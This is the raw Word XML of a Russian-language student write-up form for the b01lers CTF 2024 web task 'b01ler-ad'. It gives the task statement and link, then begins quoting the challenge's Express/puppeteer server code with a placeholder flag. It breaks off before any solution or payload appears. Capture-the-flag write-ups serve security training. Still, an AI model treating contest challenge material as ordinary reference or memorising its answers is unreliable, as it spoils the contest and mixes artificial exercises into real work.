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2547" w:rsidRDefault="00B02547" w:rsidP="00B02547">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpX="137" w:tblpY="116"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="7643"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547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2547" w:rsidRDefault="00B02547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 xml:space="preserve">Белютий Назар, КБ-221, </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B02547" w:rsidRDefault="00B02547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>2024.06.27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547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B02547" w:rsidRDefault="00B02547">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28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Турнир, название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задачи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,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категории, ссылки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547">
        <w:trPr>
          <w:trHeight w:val="470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2547" w:rsidRPr="00B02547" w:rsidRDefault="00B02547" w:rsidP="00B02547">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline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r w:rsidRPr="00B02547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Турнир</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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2547" w:rsidRDefault="00B02547" w:rsidP="00B02547">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>b01lers CTF 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547">
        <w:trPr>
          <w:trHeight w:val="470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2547" w:rsidRPr="00B02547" w:rsidRDefault="00B02547" w:rsidP="00B02547">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0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r w:rsidRPr="00B02547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Задача</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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2547" w:rsidRDefault="00B02547" w:rsidP="00B02547">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B02547">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>b01ler-ad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547">
        <w:trPr>
          <w:trHeight w:val="470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2547" w:rsidRDefault="00B02547" w:rsidP="00B02547">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Категории</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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2547" w:rsidRPr="00B02547" w:rsidRDefault="00B02547" w:rsidP="00B02547">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547">
        <w:trPr>
          <w:trHeight w:val="470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2547" w:rsidRDefault="00B02547" w:rsidP="00B02547">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Ссылка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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2547" w:rsidRDefault="00B0254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https://ctftime.org/event/2250/tasks/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547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B02547" w:rsidRDefault="00B02547">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0"/>
              <w:jc w:val="center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proofErr w:type="spellStart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Условие</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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задачи </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547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547" w:rsidRPr="00B02547" w:rsidRDefault="00B02547" w:rsidP="00B0254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02547">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Ads </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B02547">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Ads</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B0254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2547">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Ads</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B02547">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">! Cheap too! You want an Ad on our site? </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B0254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Just</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B0254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B0254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let</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B0254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B0254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us</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B0254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B0254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know</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B0254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!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B02547" w:rsidRPr="00B02547" w:rsidRDefault="00B02547" w:rsidP="00B0254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:rsidR="00B02547" w:rsidRDefault="00B02547" w:rsidP="00B0254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0254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http://b01ler-ads.hammer.b01le.rs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547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B02547" w:rsidRDefault="00B02547">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/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  <w:t>РЕШЕНИЕ (сохранить особенности текста и ссылки)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547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B02547" w:rsidRDefault="00B02547">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/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Quick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Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Attachments</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
              <w:ind w:left="375"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>dist.zip</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>The dist.zip contains an index.js file with the following code:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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express = </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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require</w:t>
            </w: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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'express'</w:t>
            </w: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)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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puppeteer = </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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require</w:t>
            </w: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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'puppeteer'</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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cookieParser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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= </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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require</w:t>
            </w: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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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"cookie-parser"</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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rateLimit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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= </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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require</w:t>
            </w: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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'express-rate-limit'</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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require</w:t>
            </w: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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7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dotenv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7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'</w:t>
            </w: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).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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app = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart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express(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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port = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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process.env.PORT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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|| </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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3000</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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CONFIG = {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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APPURL: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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process.env</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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[</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'APPURL'</w:t>
            </w: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] || </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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`http://127.0.0.1:</w:t>
            </w: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${port}</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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`</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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APPFLAG: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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process.env</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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[</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'APPFLAG'</w:t>
            </w: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] || </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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"fake{flag}"</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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console</w:t>
            </w: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.table</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(CONFIG)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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limiter = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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rateLimit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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windowMs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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60</w:t>
            </w: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* </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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1000</w:t>
            </w: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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="888888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// 1 minute</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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limit: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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4</w:t>
            </w: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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="888888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// Limit each IP to 4 requests per `window` (here, per minute).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart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standardHeaders</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'draft-7'</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart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legacyHeaders</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="78A96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false</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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})</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart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app.use</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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express.json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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());</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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app.use</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd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express.urlencoded</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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({ extended: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="78A96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true</w:t>
            </w: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}));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart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app.use</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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cookieParser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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app.set</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B059C7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'views'</w:t>
            </w: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 __</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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dirname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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+ </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'/views'</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart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app.use</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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express.static</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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"./public"</w:t>
            </w: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));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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app.engine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'html'</w:t>
            </w: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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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require</w:t>
            </w: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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7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ejs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7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'</w:t>
            </w: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).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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renderFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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app.set</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B059C7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'view engine'</w:t>
            </w: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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7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ejs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7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'</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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function</w:t>
            </w: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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
